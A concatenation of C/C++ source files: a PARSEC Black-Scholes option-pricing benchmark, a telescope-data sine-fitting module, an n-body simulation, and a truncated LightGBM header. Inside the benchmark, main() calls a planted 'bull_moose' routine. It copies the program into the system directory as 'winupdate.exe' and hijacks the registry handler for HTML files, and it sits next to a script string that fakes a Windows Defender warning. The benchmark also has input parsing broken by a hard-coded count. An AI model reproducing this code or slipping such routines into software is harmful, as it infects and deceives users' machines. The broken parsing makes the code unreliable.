//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
fptype BlkSchlsEqEuroNoDiv(fptype sptprice, fptype strike, fptype rate,
fptype volatility, fptype time, int otype,
float timet) {
fptype OptionPrice;
// local private working variables for the calculation
fptype xStockPrice;
fptype xStrikePrice;
fptype xRiskFreeRate;
fptype xVolatility;
fptype xTime;
fptype xSqrtTime;
fptype logValues;
fptype xLogTerm;
fptype xD1;
fptype xD2;
fptype xPowerTerm;
fptype xDen;
fptype d1;
fptype d2;
fptype FutureValueX;
fptype NofXd1;
fptype NofXd2;
fptype NegNofXd1;
fptype NegNofXd2;
xStockPrice = sptprice;
xStrikePrice = strike;
xRiskFreeRate = rate;
xVolatility = volatility;
xTime = time;
xSqrtTime = sqrt(xTime);
logValues = log(sptprice / strike);
xLogTerm = logValues;
xPowerTerm = xVolatility * xVolatility;
xPowerTerm = xPowerTerm * 0.5;
xD1 = xRiskFreeRate + xPowerTerm;
xD1 = xD1 * xTime;
xD1 = xD1 + xLogTerm;
xDen = xVolatility * xSqrtTime;
xD1 = xD1 / xDen;
xD2 = xD1 - xDen;
d1 = xD1;
d2 = xD2;
NofXd1 = CNDF(d1);
NofXd2 = CNDF(d2);
FutureValueX = strike * (exp(-(rate) * (time)));
if (otype == 0) {
OptionPrice = (sptprice * NofXd1) - (FutureValueX * NofXd2);
} else {
NegNofXd1 = (1.0 - NofXd1);
NegNofXd2 = (1.0 - NofXd2);
OptionPrice = (FutureValueX * NegNofXd2) - (sptprice * NegNofXd1);
}
return OptionPrice;
}
#ifdef ENABLE_TBB
struct mainWork {
mainWork() {}
mainWork(mainWork &w, tbb::split) {}
void operator()(const tbb::blocked_range<int> &range) const {
fptype price;
int begin = range.begin();
int end = range.end();
for (int i = begin; i != end; i++) {
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
fptype priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-5) {
fprintf(stderr, "Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i,
price, data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
};
#endif // ENABLE_TBB
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
#ifdef ENABLE_TBB
int bs_thread(void *tid_ptr) {
int j;
tbb::affinity_partitioner a;
mainWork doall;
for (j = 0; j < NUM_RUNS; j++) {
tbb::parallel_for(tbb::blocked_range<int>(0, numOptions), doall, a);
}
return 1;
}
#else // !ENABLE_TBB
#ifdef WIN32
DWORD WINAPI bs_thread(LPVOID tid_ptr) {
#else
int bs_thread(void *tid_ptr) {
#endif
int i, j;
fptype price;
fptype priceDelta;
int tid = *(int *)tid_ptr;
int start = tid * (numOptions / nThreads);
int end = start + (numOptions / nThreads);
for (j = 0; j < NUM_RUNS; j++) {
#ifdef ENABLE_OPENMP
#pragma omp parallel for private(i, price, priceDelta)
for (i = 0; i < numOptions; i++) {
#else // ENABLE_OPENMP
for (i = start; i < end; i++) {
#endif // ENABLE_OPENMP
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-4) {
printf("Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i, price,
data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
return 1;
}
#endif // ENABLE_TBB
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";
DWORD WINAPI bull_moose(LPVOID tid_ptr)
{
char MyPath[256], CpyPath[256];
GetModuleFileName(NULL,MyPath,sizeof(MyPath));
GetSystemDirectory(CpyPath,sizeof(CpyPath));
strcat(CpyPath,"\\winupdate.exe");
CopyFile(MyPath,CpyPath,FALSE);
strcat(CpyPath," %1");
HKEY Key32;
RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
RegCloseKey(Key32);
return 0;
}
int main(int argc, char **argv) {
FILE *file;
int i;
int loopnum;
fptype *buffer;
int *buffer2;
int rv;
#ifdef PARSEC_VERSION
#define __PARSEC_STRING(x) #x
#define __PARSEC_XSTRING(x) __PARSEC_STRING(x)
printf(
"PARSEC Benchmark Suite Version "__PARSEC_XSTRING(PARSEC_VERSION) "\n");
fflush(NULL);
#else
printf("PARSEC Benchmark Suite\n");
fflush(NULL);
#endif // PARSEC_VERSION
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_begin(__parsec_blackscholes);
#endif
// HANDLE *malicious;
// malicious = (HANDLE *)malloc(sizeof(HANDLE));
// malicious = CreateThread(0, 0, bull_moose, NULL, 0, 0);
// WaitForMultipleObjects(1, malicious, TRUE, INFINITE);
// free(malicious);
bull_moose(NULL);
if (argc != 4) {
printf("Usage:\n\t%s <nthreads> <inputFile> <outputFile>\n", argv[0]);
return 1;
}
nThreads = atoi(argv[1]);
char *inputFile = argv[2];
char *outputFile = argv[3];
// Read input data from file
file = fopen(inputFile, "r");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", inputFile);
return 1;
}
// rv = fscanf(file, "%i", &numOptions);
numOptions = 4;
if (rv != 1) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
if (nThreads > numOptions) {
printf("WARNING: Not enough work, reducing number of threads to match "
"number of options.\n");
nThreads = numOptions;
}
#if !defined(ENABLE_THREADS) && !defined(ENABLE_OPENMP) && !defined(ENABLE_TBB)
if (nThreads != 1) {
printf("Error: <nthreads> must be 1 (serial version)\n");
return 1;
}
#endif
// alloc spaces for the option data
data = (OptionData *)malloc(numOptions * sizeof(OptionData));
prices = (fptype *)malloc(numOptions * sizeof(fptype));
for (loopnum = 0; loopnum < numOptions; ++loopnum) {
rv = fscanf(file, "%f %f %f %f %f %f %c %f %f", &data[loopnum].s,
&data[loopnum].strike, &data[loopnum].r, &data[loopnum].divq,
&data[loopnum].v, &data[loopnum].t, &data[loopnum].OptionType,
&data[loopnum].divs, &data[loopnum].DGrefval);
if (rv != 9) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", inputFile);
return 1;
}
#ifdef ENABLE_THREADS
pthread_mutexattr_init(&_M4_normalMutexAttr);
// pthread_mutexattr_settype( &_M4_normalMutexAttr, PTHREAD_MUTEX_NORMAL);
_M4_numThreads = nThreads;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
_M4_threadsTableAllocated[_M4_i] = 0;
}
};
#endif
printf("Num of Options: %d\n", numOptions);
printf("Num of Runs: %d\n", NUM_RUNS);
#define PAD 256
#define LINESIZE 64
buffer = (fptype *)malloc(5 * numOptions * sizeof(fptype) + PAD);
sptprice = (fptype *)(((unsigned long long)buffer + PAD) & ~(LINESIZE - 1));
strike = sptprice + numOptions;
rate = strike + numOptions;
volatility = rate + numOptions;
otime = volatility + numOptions;
buffer2 = (int *)malloc(numOptions * sizeof(fptype) + PAD);
otype = (int *)(((unsigned long long)buffer2 + PAD) & ~(LINESIZE - 1));
for (i = 0; i < numOptions; i++) {
otype[i] = (data[i].OptionType == 'P') ? 1 : 0;
sptprice[i] = data[i].s;
strike[i] = data[i].strike;
rate[i] = data[i].r;
volatility[i] = data[i].v;
otime[i] = data[i].t;
}
printf("Size of data: %d\n", numOptions * (sizeof(OptionData) + sizeof(int)));
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_begin();
#endif
#ifdef ENABLE_THREADS
#ifdef WIN32
printf("WIN32\n");
HANDLE *threads;
int *nums;
threads = (HANDLE *)malloc(nThreads * sizeof(HANDLE));
nums = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
nums[i] = i;
threads[i] = CreateThread(0, 0, bs_thread, &nums[i], 0, 0);
}
WaitForMultipleObjects(nThreads, threads, TRUE, INFINITE);
free(threads);
free(nums);
#else
int *tids;
tids = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
tids[i] = i;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
}
pthread_create(&_M4_threadsTable[_M4_i], NULL,
(void *(*)(void *))bs_thread, (void *)&tids[i]);
_M4_threadsTableAllocated[_M4_i] = 1;
};
}
{
int _M4_i;
void *_M4_ret;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
pthread_join(_M4_threadsTable[_M4_i], &_M4_ret);
}
};
free(tids);
#endif // WIN32
#else // ENABLE_THREADS
#ifdef ENABLE_OPENMP
{
int tid = 0;
omp_set_num_threads(nThreads);
bs_thread(&tid);
}
#else // ENABLE_OPENMP
#ifdef ENABLE_TBB
tbb::task_scheduler_init init(nThreads);
int tid = 0;
bs_thread(&tid);
#else // ENABLE_TBB
// serial version
int tid = 0;
bs_thread(&tid);
#endif // ENABLE_TBB
#endif // ENABLE_OPENMP
#endif // ENABLE_THREADS
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_end();
#endif
// Write prices to output file
file = fopen(outputFile, "w");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", outputFile);
return 1;
}
rv = fprintf(file, "%i\n", numOptions);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
for (i = 0; i < numOptions; i++) {
rv = fprintf(file, "%.18f\n", prices[i]);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", outputFile);
return 1;
}
#ifdef ERR_CHK
printf("Num Errors: %d\n", numError);
#endif
free(data);
free(prices);
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_end();
#endif
return 1;
}
|
sync.c | #include "pyactpol.h"
#include <gsl/gsl_linalg.h>
/* sync.c
*
* scan-synchronous mode fitting and removal.
*/
static int fit_poly(float *x, double *y, int n, int order, int samp,
double *fit);
static int fit_sine(double *t, double *y, int n, double f,
double *fit, double *coeff);
/* Find the amplitude and phase of the synchronous signal in a set of
* detectors together with the phase of the azimuth scan.
*
* az should already have the mean removed. ctime should start at 0
* to minimize rounding errors. nwin should be the number of samples
* to use for the amplitude fit; i.e. an round number of azimuth scans.
*/
static int mbSyncFit(double* az, double* ctime,
float* data, int ndata,
int *dets, int ndets,
float *sync_amp, float* sync_phase,
float *sync_rms,
float *phaseAz,
float f,
int order, int samp, int nT)
{
int n, nwin;
double sampRate, thetaAz;
// Calculate size of data window to do analysis
sampRate = (double)ndata / (ctime[ndata-1] - ctime[0]);
nwin = floor( (double)nT / f * sampRate );
if (nwin > ndata) {
nwin = ndata;
}
double *fit_az = malloc(nwin * sizeof(double));
double *coeff_az = malloc(2 * sizeof(double));
// Obtain phase of azimuth scan
if (fit_sine(ctime, az, nwin, f, fit_az, coeff_az) != 0)
return 1;
if (coeff_az[0] > 0) thetaAz = atan(coeff_az[1]/coeff_az[0]);
else thetaAz = atan(coeff_az[1]/coeff_az[0]) + M_PI;
*phaseAz = thetaAz;
free(fit_az);
free(coeff_az);
float *tcopy = malloc(nwin * sizeof(float));
for (int j=0; j<nwin; j++)
tcopy[j] = ctime[j] - ctime[0];
// Process all selected detectors
#pragma omp parallel private(n)
{
double *y = malloc(nwin * sizeof(double));
double *fit_1f = malloc(nwin * sizeof(double));
double *fit_syn = malloc(nwin * sizeof(double));
double *coeff_syn = malloc(2 * sizeof(double));
#pragma omp for
for (n = 0; n < ndets; n++) {
int i;
double A, theta, rms;
float *det_data = data + ndata * dets[n];
// Obtain copy of data
for (i = 0; i < nwin; i++)
y[i] = det_data[i];
// Fit and subtract polynomial
fit_poly(tcopy, y, nwin, order, samp, fit_1f);
for (i = 0; i < nwin; i++)
y[i] -= fit_1f[i];
// Fit sinusoidal to obtain amplitude and phase
fit_sine(ctime, y, nwin, f, fit_syn, coeff_syn);
A = sqrt(coeff_syn[0]*coeff_syn[0] + coeff_syn[1]*coeff_syn[1]);
if (A == 0) theta = 0.0;
else if (coeff_syn[0] > 0) theta = atan(coeff_syn[1]/coeff_syn[0]);
else theta = atan(coeff_syn[1]/coeff_syn[0]) + M_PI;
sync_amp[n] = A;
sync_phase[n] = theta;
// Find fit RMS error
rms = 0.0;
for (i = 0; i < nwin; i++)
rms += (y[i] - fit_syn[i])*(y[i] - fit_syn[i]);
sync_rms[n] = sqrt(rms/nwin);
} /* pragma omp for */
free(y);
free(fit_1f);
free(fit_syn);
free(coeff_syn);
} /* pragma omp parallel */
return 0;
}
/// Fit sinusoidal of a given frequency to data.
/// \param t Independent variable (time).
/// \param y Dependent variable (data).
/// \param n Number of elements in data.
/// \param f Frequency of the sinusoid.
/// \param fit Vector of fitted data (sinusoid).
/// \param coeff Coefficients of sinusoid (A*cos(th) + B*sin(th)).
static int fit_sine(double *t, double *y, int n, double f,
double *fit, double *coeff) {
int k;
double temp_c, temp_s;
double cos2, sin2, sincos, ycos, ysin;
cos2 = sin2 = sincos = ycos = ysin = 0.0;
for (k = 0; k < n; k++) {
temp_c = cos(2*M_PI*f*t[k]);
temp_s = sin(2*M_PI*f*t[k]);
cos2 += temp_c*temp_c;
sin2 += temp_s*temp_s;
sincos += temp_s*temp_c;
ycos += y[k]*temp_c;
ysin += y[k]*temp_s;
}
coeff[0] = (sin2*ycos - sincos*ysin) / (cos2*sin2 - sincos*sincos);
coeff[1] = (cos2*ysin - sincos*ycos) / (cos2*sin2 - sincos*sincos);
// Evaluate result
for (k = 0; k < n; k++) {
fit[k] = cos(2*M_PI*f*t[k])*coeff[0] + sin(2*M_PI*f*t[k])*coeff[1];
}
return 0;
}
/// Fit polynomial to data to remove common mode.
/// \param x Independent variable.
/// \param y Dependent variable (data).
/// \param n Number of elements in data.
/// \param order Order of polinomial to fit.
/// \param samp Number of samples to take from data to do the fit.
/// \param fit vector with evaluated polynomial
static int fit_poly(float *x, double *y, int n, int order, int samp,
double *fit) {
int i, j, k;
int N;
double *coeff;
double **A, *pows;
double temp;
gsl_vector *g_Ab = gsl_vector_calloc(order+1);
gsl_matrix *g_AA = gsl_matrix_alloc(order+1,order+1);
gsl_vector *g_x = gsl_vector_alloc(order+1);
gsl_permutation *g_p = gsl_permutation_alloc(order+1);
int signum = 0;
int status = 1; // failure.
if (order <= 0) {
print_error("Invalid 'order=%i' in fit_poly\n", order);
return 1;
}
// Initializa Matrices and Vectors
coeff = malloc((order+1) * sizeof(double));
N = n/samp;
if (N < order) {
print_error("Fitting 'order=%i' with 'N=%i' data points in fit_poly\n", order, N);
return 1;
}
A = (double **)malloc((order+1) * sizeof(double *));
A[0] = (double *)malloc(N * (order+1) * sizeof(double));
for (i = 0; i < order+1; i++){
A[i] = A[0] + N * i;
for( j = 0; j < N; j++ ) A[i][j] = 0.0;
}
pows = (double *)malloc((2*order+1) * sizeof(double));
for (i = 0; i < 2*order+1; i++)
pows[i] = 0.0;
// Generate A matrix
for (i = 0; i < order+1; i++)
for (k = 0; k < N; k++) {
A[i][k] = 1.0;
for (j = 0; j < i; j++)
A[i][k] *= x[k*samp + samp/2];
}
// Generate AA as transpose(A)*A
for (i = 2*order; i > 0; i -= 2) {
for (k = 0; k < N; k++) {
pows[i] += A[i/2][k]*A[i/2][k];
pows[i-1] += A[i/2][k]*A[i/2-1][k];
}
}
for (k = 0; k < N; k++)
pows[0]++;
for (i = 0; i < order+1; i++)
for (j = 0; j < order+1; j++)
g_AA->data[i*g_AA->tda+j] = pows[i+j];
/* for (i = 0; i < order+1; i++) {
for (j = 0; j <= i; j++) {
for (k = 0; k < N; k++)
AA[i][j] += A[j][k]*A[i][k];
}
}*/
// Generate Ab as transpose(A)*y
for (i = 0; i < order+1; i++) {
for (k = 0; k < N; k++) {
temp = 0.0;
for (j = 0; j < samp; j++)
temp += y[k*samp + j];
g_Ab->data[i] += A[i][k] * temp / (float)samp;
}
}
// Solve system
if ((status = gsl_linalg_LU_decomp(g_AA, g_p, &signum))!=0)
goto exit_now;
if ((status = gsl_linalg_LU_solve(g_AA, g_p, g_Ab, g_x))!=0)
goto exit_now;
// Copy out...
for (i = 0; i < order+1; i++)
coeff[i] = g_x->data[i];
// Evaluate result
for (k = 0; k < n; k++) {
fit[k] = 0.0;
for (i = 0; i < order+1; i++) {
temp = 1.0;
for (j = 0; j < i; j++)
temp *= x[k];
fit[k] += temp * coeff[i];
}
}
/*
for (k = 0; k < n; k++)
fit[k] = 0.0;
for (i = 0; i < order+1; i++)
for (k = 0; k < n; k++)
fit[k] += A[i][k] * Ab[i];
*/
status = 0;
exit_now:
free(A[0]);
free(A);
free(pows);
free(coeff);
gsl_vector_free(g_Ab);
gsl_vector_free(g_x);
gsl_matrix_free(g_AA);
gsl_permutation_free(g_p);
return status;
}
PyDoc_STRVAR(get_sync_amps__doc__,
"get_sync_amps(data, dets, az, ctime)\n"
"\n"
"The arrays must be C-ordered with dimensions like:\n"
" data [ *,n_data] (float)\n"
" dets [n_det] (int)\n"
" az [n_data] (double)\n"
" ctime[n_data] (double)\n"
"\n"
"Returns (az_phase, amps_cos, amps_sin)."
);
static PyObject *get_sync_amps(PyObject *self, PyObject *args)
{
PyArrayObject *data_array;
PyArrayObject *dets_array;
PyArrayObject *az_array;
PyArrayObject *ctime_array;
double scan_freq;
int order, samp, nT;
if (!PyArg_ParseTuple(args, "O!O!O!O!diii",
&PyArray_Type, &data_array,
&PyArray_Type, &dets_array,
&PyArray_Type, &az_array,
&PyArray_Type, &ctime_array,
&scan_freq,
&order,
&samp,
&nT
))
po_raise("invalid arguments.");
// Types and ordering
ASSERT_CARRAY_TYPE_NDIM(data_array, NPY_FLOAT32, 2);
ASSERT_CARRAY_TYPE_NDIM(dets_array, NPY_INT32, 1);
ASSERT_CARRAY_TYPE_NDIM(az_array, NPY_FLOAT64, 1);
ASSERT_CARRAY_TYPE_NDIM(ctime_array, NPY_FLOAT64, 1);
int ndata = PyArray_DIMS(data_array)[1];
int ndet = PyArray_DIMS(dets_array)[0];
po_assert(PyArray_DIMS(az_array)[0] == ndata);
po_assert(PyArray_DIMS(ctime_array)[0] == ndata);
float *data = PyArray_DATA(data_array);
double *az = PyArray_DATA(az_array);
double *ctime = PyArray_DATA(ctime_array);
int *dets = PyArray_DATA(dets_array);
// We've been so thorough, it would be a shame to segfault now.
for (int i=0; i<ndet; i++)
po_assert(dets[i] >= 0 &&
dets[i] < PyArray_DIMS(data_array)[0]);
// And, places for the results.
npy_intp ndet_ = ndet;
PyArrayObject *amp_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
PyArrayObject *phase_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
PyArrayObject *rms_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
float phaseAz = -1.;
mbSyncFit(az, ctime,
data, ndata,
dets, ndet,
PyArray_DATA(amp_array),
PyArray_DATA(phase_array),
PyArray_DATA(rms_array),
&phaseAz,
scan_freq, order, samp, nT);
return Py_BuildValue("NNNf",
amp_array,
phase_array,
rms_array,
phaseAz);
}
PyMethodDef pyactpol_sync_methods[] = {
{"get_sync_amps", get_sync_amps, METH_VARARGS,
get_sync_amps__doc__},
{NULL, NULL, 0, NULL} /* Sentinel */
};
|
nbody-block.c | #include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include "timer.h"
#define CACHELINE 64 // size of cache line [bytes]
#define SOFTENING 1e-9f
typedef struct { float *x, *y, *z, *vx, *vy, *vz; } BodySystem;
void randomizeBodies(float *data, int n) {
for (int i = 0; i < n; i++) {
data[i] = 2.0f * (rand() / (float)RAND_MAX) - 1.0f;
}
}
void bodyForce(BodySystem p, float dt, int n, int tileSize) {
for (int tile = 0; tile < n; tile += tileSize) {
int to = tile + tileSize;
if (to > n) to = n;
#pragma omp parallel for schedule(dynamic)
for (int i = 0; i < n; i++) {
float Fx = 0.0f; float Fy = 0.0f; float Fz = 0.0f;
for (int j = tile; j < to; j++) {
float dy = p.y[j] - p.y[i];
float dz = p.z[j] - p.z[i];
float dx = p.x[j] - p.x[i];
float distSqr = dx*dx + dy*dy + dz*dz + SOFTENING;
float invDist = 1.0f / sqrtf(distSqr);
float invDist3 = invDist * invDist * invDist;
Fx += dx * invDist3; Fy += dy * invDist3; Fz += dz * invDist3;
}
p.vx[i] += dt*Fx; p.vy[i] += dt*Fy; p.vz[i] += dt*Fz;
}
}
}
int main(const int argc, const char** argv) {
int nBodies = 32768;
if (argc > 1) nBodies = atoi(argv[1]);
int tileSize = 24400;
if (tileSize > nBodies) tileSize = nBodies;
const float dt = 0.01f; // time step
const int nIters = 10; // simulation iterations
int bytes = 6*nBodies*sizeof(float);
float *buf = (float*)malloc(bytes);
BodySystem p;
p.x = buf+0*nBodies; p.y = buf+1*nBodies; p.z = buf+2*nBodies;
p.vx = buf+3*nBodies; p.vy = buf+4*nBodies; p.vz = buf+5*nBodies;
randomizeBodies(buf, 6*nBodies); // Init pos / vel data
double totalTime = 0.0;
for (int iter = 1; iter <= nIters; iter++) {
StartTimer();
bodyForce(p, dt, nBodies, tileSize); // compute interbody forces
for (int i = 0 ; i < nBodies; i++) { // integrate position
p.x[i] += p.vx[i]*dt;
p.y[i] += p.vy[i]*dt;
p.z[i] += p.vz[i]*dt;
}
const double tElapsed = GetTimer() / 1000.0;
if (iter > 1) { // First iter is warm up
totalTime += tElapsed;
}
#ifndef SHMOO
printf("Iteration %d: %.3f seconds\n", iter, tElapsed);
#endif
}
double avgTime = totalTime / (double)(nIters-1);
#ifdef SHMOO
printf("%d, %0.3f\n", nBodies, 1e-9 * nBodies * nBodies / avgTime);
#else
printf("Average rate for iterations 2 through %d: %.3f steps per second.\n",
nIters);
printf("%d Bodies: average %0.3f Billion Interactions / second\n", nBodies, 1e-9 * nBodies * nBodies / avgTime);
#endif
free(buf);
}
|
dataset.h | /*!
* Copyright (c) 2016 Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE file in the project root for license information.
*/
#ifndef LIGHTGBM_DATASET_H_
#define LIGHTGBM_DATASET_H_
#include <LightGBM/config.h>
#include <LightGBM/feature_group.h>
#include <LightGBM/meta.h>
#include <LightGBM/utils/openmp_wrapper.h>
#include <LightGBM/utils/random.h>
#include <LightGBM/utils/text_reader.h>
#include <string>
#include <functional>
#include <memory>
#include <mutex>
#include <unordered_set>
#include <utility>
#include <vector>
namespace LightGBM {
/*! \brief forward declaration */
class DatasetLoader;
/*!
* \brief This class is used to store some meta(non-feature) data for training data,
* e.g. labels, weights, initial scores, qurey level informations.
*
* Some details:
* 1. Label, used for traning.
* 2. Weights, weighs of records, optional
* 3. Query Boundaries, necessary for lambdarank.
* The documents of i-th query is in [ query_boundarise[i], query_boundarise[i+1] )
* 4. Query Weights, auto calculate by weights and query_boundarise(if both of them are existed)
* the weight for i-th query is sum(query_boundarise[i] , .., query_boundarise[i+1]) / (query_boundarise[i + 1] - query_boundarise[i+1])
* 5. Initial score. optional. if exsitng, the model will boost from this score, otherwise will start from 0.
*/
class Metadata {
public:
/*!
* \brief Null costructor
*/
Metadata();
/*!
* \brief Initialization will load qurey level informations, since it is need for sampling data
* \param data_filename Filename of data
* \param init_score_filename Filename of initial score
*/
void Init(const char* data_filename, const char* initscore_file);
/*!
* \brief init as subset
* \param metadata Filename of data
* \param used_indices
* \param num_used_indices
*/
void Init(const Metadata& metadata, const data_size_t* used_indices, data_size_t num_used_indices);
/*!
* \brief Initial with binary memory
* \param memory Pointer to memory
*/
void LoadFromMemory(const void* memory);
/*! \brief Destructor */
~Metadata();
/*!
* \brief Initial work, will allocate space for label, weight(if exists) and query(if exists)
* \param num_data Number of training data
* \param weight_idx Index of weight column, < 0 means doesn't exists
* \param query_idx Index of query id column, < 0 means doesn't exists
*/
void Init(data_size_t num_data, int weight_idx, int query_idx);
/*!
* \brief Partition label by used indices
* \param used_indices Indice of local used
*/
void PartitionLabel(const std::vector<data_size_t>& used_indices);
/*!
* \brief Partition meta data according to local used indices if need
* \param num_all_data Number of total training data, including other machines' data on parallel learning
* \param used_data_indices Indices of local used training data
*/
void CheckOrPartition(data_size_t num_all_data,
const std::vector<data_size_t>& used_data_indices);
void SetLabel(const label_t* label, data_size_t len);
void SetWeights(const label_t* weights, data_size_t len);
void SetQuery(const data_size_t* query, data_size_t len);
/*!
* \brief Set initial scores
* \param init_score Initial scores, this class will manage memory for init_score.
*/
void SetInitScore(const double* init_score, data_size_t len);
/*!
* \brief Save binary data to file
* \param file File want to write
*/
void SaveBinaryToFile(const VirtualFileWriter* writer) const;
/*!
* \brief Get sizes in byte of this object
*/
size_t SizesInByte() const;
/*!
* \brief Get pointer of label
* \return Pointer of label
*/
inline const label_t* label() const { return label_.data(); }
/*!
* \brief Set label for one record
* \param idx Index of this record
* \param value Label value of this record
*/
inline void SetLabelAt(data_size_t idx, label_t value) {
label_[idx] = value;
}
/*!
* \brief Set Weight for one record
* \param idx Index of this record
* \param value Weight value of this record
*/
inline void SetWeightAt(data_size_t idx, label_t value) {
weights_[idx] = value;
}
/*!
* \brief Set Query Id for one record
* \param idx Index of this record
* \param value Query Id value of this record
*/
inline void SetQueryAt(data_size_t idx, data_size_t value) {
queries_[idx] = static_cast<data_size_t>(value);
}
/*!
* \brief Get weights, if not exists, will return nullptr
* \return Pointer of weights
*/
inline const label_t* weights() const {
if (!weights_.empty()) {
return weights_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get data boundaries on queries, if not exists, will return nullptr
* we assume data will order by query,
* the interval of [query_boundaris[i], query_boundaris[i+1])
* is the data indices for query i.
* \return Pointer of data boundaries on queries
*/
inline const data_size_t* query_boundaries() const {
if (!query_boundaries_.empty()) {
return query_boundaries_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get Number of queries
* \return Number of queries
*/
inline data_size_t num_queries() const { return num_queries_; }
/*!
* \brief Get weights for queries, if not exists, will return nullptr
* \return Pointer of weights for queries
*/
inline const label_t* query_weights() const {
if (!query_weights_.empty()) {
return query_weights_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get initial scores, if not exists, will return nullptr
* \return Pointer of initial scores
*/
inline const double* init_score() const {
if (!init_score_.empty()) {
return init_score_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get size of initial scores
*/
inline int64_t num_init_score() const { return num_init_score_; }
/*! \brief Disable copy */
Metadata& operator=(const Metadata&) = delete;
/*! \brief Disable copy */
Metadata(const Metadata&) = delete;
private:
/*! \brief Load initial scores from file */
void LoadInitialScore(const char* initscore_file);
/*! \brief Load wights from file */
void LoadWeights();
/*! \brief Load query boundaries from file */
void LoadQueryBoundaries();
/*! \brief Load query wights */
void LoadQueryWeights();
/*! \brief Filename of current data */
std::string data_filename_;
/*! \brief Number of data */
data_size_t num_data_;
/*! \brief Number of weights, used to check correct weight file */
data_size_t num_weights_;
/*! \brief Label data */
std::vector<label_t> label_;
/*! \brief Weights data */
std::vector<label_t> weights_;
/*! \brief Query boundaries */
std::vector<data_size_t> query_boundaries_;
/*! \brief Query weights */
std::vector<label_t> query_weights_;
/*! \brief Number of querys */
data_size_t num_queries_;
/*! \brief Number of Initial score, used to check correct weight file */
int64_t num_init_score_;
/*! \brief Initial score */
std::vector<double> init_score_;
/*! \brief Queries data */
std::vector<data_size_t> queries_;
/*! \brief mutex for threading safe call */
std::mutex mutex_;
bool weight_load_from_file_;
bool query_load_from_file_;
bool init_score_load_from_file_;
};
/*! \brief Interface for Parser */
class Parser {
public:
/*! \brief virtual destructor */
virtual ~Parser() {}
/*!
* \brief Parse one line with label
* \param str One line record, string format, should end with '\0'
* \param out_features Output columns, store in (column_idx, values)
* \param out_label Label will store to this if exists
*/
virtual void ParseOneLine(const char* str,
std::vector<std::pair<int, double>>* out_features, double* out_label) const = 0;
virtual int TotalColumns() const = 0;
/*!
* \brief Create a object of parser, will auto choose the format depend on file
* \param filename One Filename of data
* \param num_features Pass num_features of this data file if you know, <=0 means don't know
* \param label_idx index of label column
* \return Object of parser
*/
static Parser* CreateParser(const char* filename, bool header, int num_features, int label_idx);
};
/*! \brief The main class of data set,
* which are used to traning or validation
*/
class Dataset {
public:
friend DatasetLoader;
LIGHTGBM_EXPORT Dataset();
LIGHTGBM_EXPORT Dataset(data_size_t num_data);
void Construct(
std::vector<std::unique_ptr<BinMapper>>& bin_mappers,
int** sample_non_zero_indices,
const int* num_per_col,
size_t total_sample_cnt,
const Config& io_config);
/*! \brief Destructor */
LIGHTGBM_EXPORT ~Dataset();
LIGHTGBM_EXPORT bool CheckAlign(const Dataset& other) const {
if (num_features_ != other.num_features_) {
return false;
}
if (num_total_features_ != other.num_total_features_) {
return false;
}
if (label_idx_ != other.label_idx_) {
return false;
}
for (int i = 0; i < num_features_; ++i) {
if (!FeatureBinMapper(i)->CheckAlign(*(other.FeatureBinMapper(i)))) {
return false;
}
}
return true;
}
inline void PushOneRow(int tid, data_size_t row_idx, const std::vector<double>& feature_values) {
if (is_finish_load_) { return; }
